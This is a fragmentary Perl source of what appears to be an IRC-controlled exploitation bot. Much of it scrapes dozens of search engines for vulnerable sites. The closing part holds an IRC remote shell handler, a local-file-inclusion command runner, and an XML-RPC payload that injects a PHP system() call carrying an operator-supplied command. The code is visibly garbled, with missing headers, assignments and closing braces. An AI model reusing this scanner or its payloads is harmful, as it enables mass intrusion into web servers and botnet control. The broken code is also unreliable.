if ($1 !~ /goodsearch|good\.is|w3\.org|quantserve/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub google2() {
my @list;
my $key = $_[0];
my $b = 0;
my @doms =
("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd
","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","
co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","c
om.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn",
"hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","
co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms
","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np
","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr"
,"pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","
sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug
","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","c
o.zm");
my $search = ("http://www.google.".$dom."/search?
num=50&q=".&key($key)."&start=".$b."&sa=N");
my $res = &search_engine_query($search);
if ($1 !~ /google/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
} return @list;
}
sub exalead() {
my @list;
my $key = $_[0];
my $search = ("http://www.exalead.com/search/web/results/?
q=".&key($key)."&elements_per_page=100&start_index=".$b);
my $res = &search_engine_query($search);
my $link = $1;
if ($link!~ /exalead/){
my @grep = &links($link);
push(@list,@grep);
return @list;
sub lycos() {
my @list;
my $key = $_[0];
my $search = ("http://search.lycos.com/?query=".&key($key)."&page2=".
$b."&tab=web&searchArea=web&diktfc=468007302EF7DB9AFE53D4138B848E7B4000D424385F");
my $res = &search_engine_query($search);
if ($1 !~ /lycos\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub virgilio() {
my @list;
my $key = $_[0];
my $res = &search_engine_query($search);
if ($1 !~ /\.virgilio\.it/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub webde() {
my @list;
my $key = $_[0];
my $res = &search_engine_query($search);
my $link = $1;
if ($link!~ /suche|web/){
my @grep = &links($link);
push(@list,@grep);
return @list;
sub hotbot() {
my @list;
my $key = $_[0];
my $search = ("http://www.hotbot.com/?
query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=msn&page=".
$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
my $res = &search_engine_query($search);
if ($1 !~ /hotbot\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub aol() {
my @list;
my $key = $_[0];
my $search = ("http://aim.search.aol.com/aol/search?
q=".&key($key)."&page=".$b);
my $res = &search_engine_query($search);
while ($res =~ m/href=\"http:\/\/(.*?)\" property/g) {
if ($1 !~ /aol\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub sapo(){
my @list;
my $key = $_[0];
my $search = ("http://pesquisa.sapo.pt/?
barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".
$b."&q=".&key($key)."&st=local");
my $res = &search_engine_query($search);
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub duck() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://duckduckgo.com/html/?
q=".&key($key)."&t=A&l=en&p=1&s=".$b."&o=json&dc=".$b."&api=d.js");
my $res = &search_engine_query($search);
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub lygo() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://www.hotbot.com/?
query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=lygo&page2=".
$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
my $res = &search_engine_query($search);
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub yause() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://www.yauba.com/?
query=".&key($key)."&where=websites&target=websites&con=y&ilang=english&clt=topic&p
g=".$b);
my $res = &search_engine_query($search);
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub baidu() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://www.baidu.com/s?wd=".&key($key)."&pn=".$b);
my $res = &search_engine_query($search);
if ($1 !~ /baidu\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub kipot() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://www.qkport.com/".$b."/web/".&key($key));
my $res = &search_engine_query($search);
if ($1 !~ /qkport\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
my @list;
my $key = $_[0];
my $hal = "/search?q=".&key($key);
my $search = ("http://www.gigablast.com".$hal);
my $res = &search_engine_query($search);
$search = ("http://www.gigablast.com".$hal);
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
if ($res =~ m/<center><a href=\"(.*?)\">/) { $hal = $1; }
$res = &search_engine_query($search);
}return @list;
sub black() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://blekko.com/ws/".&key($key)."?ft=&p=".$b);
my $cek = $b+1;
my $res = &search_engine_query($search);
if ($1 !~ /blekko/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
return @list;
sub onet() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".&key($key));
my $res = &search_engine_query($search);
if ($1 !~ /webcache|query/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
return @list;
sub sizuka() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://www.szukacz.pl/szukaj.aspx?
ct=polska&pc=polska&q=".&key($key)."&start=".$b);
my $res = &search_engine_query($search);
if ($1 !~ /szukacz/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
}
sub walla() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://search.walla.co.il/?t=0&e=utf&q=".&key($key)."&p=".
$b);
my $res = &search_engine_query($search);
if ($1 !~ /walla\.co\.il/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
}
sub demos() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://search.dmoz.org/search/search?
q=".&key($key)."&start=".$b."&type=next&all=yes");
my $res = &search_engine_query($search);
if ($1 !~ /search|dmoz/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
}
sub rose() {
my @list;
my $key = $_[0];
my $b = 0;
my @langs =
("de","nl","fi","ps","da","en","es","fr","it","no","sv","cs","pl","ru");
my $search = ("http://euroseek.com/system/search.cgi?language=".
$lang."&mode=internet&start=".$b."&string=".&key($key));
my $res = &search_engine_query($search);
if ($1 !~ /euroseek/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}return @list;
}
sub seznam() {
my @list;
my $key = $_[0];
my $search = ("http://search.seznam.cz/?
q=".&key($key)."&count=10&pId=SkYLl2GXwV0CZZUQcglt&from=".$b);
my $res = &search_engine_query($search);
if ($1 !~ /seznam/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub tiscali() {
my @list;
my $key = $_[0];
my $search = ("http://search.tiscali.it/?
tiscalitype=web&collection=web&start=".$b."&q=".&key($key));
my $res = &search_engine_query($search);
if ($1 !~ /tiscali/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub naver() {
my @list;
my $key = $_[0];
my $res = &search_engine_query($search);
if ($1 !~ /naver/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
#########################################
sub clean() {
my @cln = ();
my %visit = ();
foreach my $element (@_) {
$element =~ s/\/+/\//g;
next if $visit{$element}++;
return @cln;
sub key() {
my $dork = $_[0];
$dork =~ s/ /\+/g;
$dork =~ s/:/\%3A/g;
$dork =~ s/\//\%2F/g;
$dork =~ s/\?/\%3F/g;
$dork =~ s/&/\%26/g;
$dork =~ s/\"/\%22/g;
$dork =~ s/,/\%2C/g;
$dork =~ s/\\/\%5C/g;
$dork =~ s/@/\%40/g;
$dork =~ s/\[/\%5B/g;
$dork =~ s/\]/\%5D/g;
$dork =~ s/\?/\%3F/g;
$dork =~ s/\=/\%3D/g;
$dork =~ s/\|/\%7C/g;
return $dork;
sub links() {
my @list;
my $link = $_[0];
my $host = $_[0];
my $hdir = $_[0];
$hdir =~ s/(.*)\/[^\/]*$/$1/;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host .= "/";
$link .= "/";
$hdir .= "/";
$host =~ s/\/\//\//g;
$hdir =~ s/\/\//\//g;
$link =~ s/\/\//\//g;
push(@list,$link,$host,$hdir);
return @list;
sub search_engine_query($) {
my $url = $_[0];
$url =~ s/http:\/\///;
my $host = $url;
my $query = $url;
my $page = "";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~ s/$host//;
eval {
my @pages = <$sock>;
$page = "@pages";
close($sock);
};
return $page;
#########################################
sub shell() {
my $path = $_[0];
my $cmd = $_[1];
return;
my $c = 0;
chop $output;
&msg("$path","$output");
if ($c == 5) { $c = 0; sleep 2; }
exit;
}}
sub isAdmin() {
my $status = 0;
my $nick = $_[0];
return $status;
sub msg() {
}
sub nick() {
sendraw("NICK $_[0]");
sub notice() {
sub cmdlfi() {
my $browser = LWP::UserAgent->new;
my $url = $_[0];
my $cmd = $_[1];
my $chan = $_[2];
$browser->agent("$hie");
$browser->timeout(7);
$response = $browser->get( $url );
if ($response->content =~ /j13mbut(.*)j13mbut/s) {
&msg("$chan","#15,1(#4@9CMDLFI#15)#9 $1#");
} else {
&msg("$chan","#15,1(#4@9CMDLFI#15)#4 No Output#");
sub cmdxml() {
my $jed = $_[0];
my $dwa = $_[1];
my $chan = $_[2];
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'bamby';system('".
$dwa."');echo'solo';exit;/*</name></value></param></params></methodCall>";
if ($response->content =~ /bamby(.*)solo/s) {
&msg("$chan","#15,1(#4@9CMDXML#15)#9 $1#");
} else {
&msg("$chan","#15,1(#4@9CMDXML#15)#4 No Output#");